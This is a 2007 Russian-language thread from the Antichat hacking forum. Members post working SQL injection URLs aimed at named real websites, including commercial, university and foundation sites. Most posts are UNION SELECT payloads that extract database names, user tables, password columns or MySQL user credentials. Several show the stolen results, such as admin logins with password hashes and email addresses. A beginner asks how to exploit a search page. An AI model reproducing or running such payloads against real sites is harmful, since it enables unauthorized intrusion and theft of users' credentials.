Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.07.2007, 18:48
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
www.wanna-be.tv
9 юзеров
Код:
http://www.wanna-be.tv/items.php?item=99999999+union+select+1,id,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,password,38+from+users+limit+0,1/*
|
|
|
12.07.2007, 19:17
|
|
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543
Репутация:
29
|
|
www.active-video.net
Код:
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12/*
sitemaster@localhost: 5.0.22:zerinru_cms
Код:
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(58),table_name),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+column_name=0x6c6f67696e+limit+0,1/*
вытаскиваем таблицу с юзерами: zerinru_cms:users_mk
Код:
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(58),COLUMN_NAME),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name='users_mk'+limit+0,1/*
узнаем имена колонок:ID,Login,Password,Email,Status
Код:
http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,login,password,ID,Email),4,5,6,7,8,9,10,11,12+from+users_mk/*
=))
admin:8dc6eab8d5b075c7523797412cba4564:1:asd@asd.a sd
news:bd27bd83e6598a329eaee5c62a876726:2:asd@asd.as d
user:e7c3218ac64594c02bc5c793f5c6b99a:3:none
Последний раз редактировалось V1p-eR; 12.07.2007 в 19:31..
|
|
|
|
12.07.2007, 23:19
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Код:
http://www.leform.ru/design.php?id=430%20union%20select%201,name,id,4,5,6,7,8,9%20from%20designer/*
джэс тур
Код:
http://www.bali-welcome.ru/hotel6.php?id=430%20union%20select%201,2,3,4,5,concat(user(),char(58),database()),7/*
Последний раз редактировалось kair; 13.07.2007 в 00:35..
|
|
|
|
13.07.2007, 04:18
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
Уруру - http://www.webfile.ru/files.php?search=gemaglabin')+and+1=0+union+select +1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+From+IN FORMATION_SCHEMA.TABLES+LIMIT+1,1/*
|
|
|
|
13.07.2007, 10:17
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Гема ужасно набоянил =)
///
http://www.fondationbrigittebardot.fr/site/fondation.php?Id=-6+union+select+1,aes_decrypt(aes_encrypt(version() ,0x99),0x99),3,4,5,6
Последний раз редактировалось Spyder; 13.07.2007 в 10:31..
|
|
|
|
13.07.2007, 16:29
|
|
Новичок
Регистрация: 13.07.2007
Сообщений: 3
Провел на форуме:
13209
Репутация:
0
|
|
Вопрос от новичка:
тестирую www.ukazatel.ru/search.php
инъекцию допускает, но ничего путного извлечь не мог, результаты запроса не сразу выводятся, а идут дальше в другой запрос. Это что значит, что инъекция тут невозможнп?
|
|
|
|
13.07.2007, 17:11
|
|
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474
Репутация:
26
|
|
Иркутский филиал СТК. 36 таблиц с паролями x_X
Код:
http://www.esir.ru/ru/contact/forum/s/p/?checkforums=1&checksubject=-1+union+select+1,2,3,4,5,concat_ws(0x203a20,user(),version(),database()),count(concat_ws(0x203a20,table_schema,table_name,column_name)),8,9,10,11,12,13,14,15+from+information_schema.columns+where+column_name="passwd"+or+column_name="password"+or+column_name="pass"
Для красивого вывода можно было бы раскрутить _http://www.esir.ru/ru/contact/forum/s/?checkforums=-1+or+1=2 но чего-то не получилось =\ |
|
|
|
13.07.2007, 23:29
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
http://www.master-office.ru/index.php?l=2&pid=-1%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7/*
Четверка. Вывести ничего не получилось :(
|
|
|
|
14.07.2007, 19:15
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://www.ciu.edu/seminary/faculty/contact.php?id=-1+union+select+1,2,3,concat(0x22202F3E3C62723E3C62 723E3C63656E7465723E3C623E,VERSION(),0x3a,DATABASE (),0x3a,USER(),0x3C2F623E3C2F63656E7465723E3C212D2 D)
Во как  Четвёртая, перебирать лень 
|
|
|
|
14.07.2007, 19:21
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x5B3A5 D,user,password),11,12,13,14,15,16,17,18,19,20,21, 22,23,24+from+mysql.user
Хы... Первый раз вижу что бы всё было так запущено =\
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
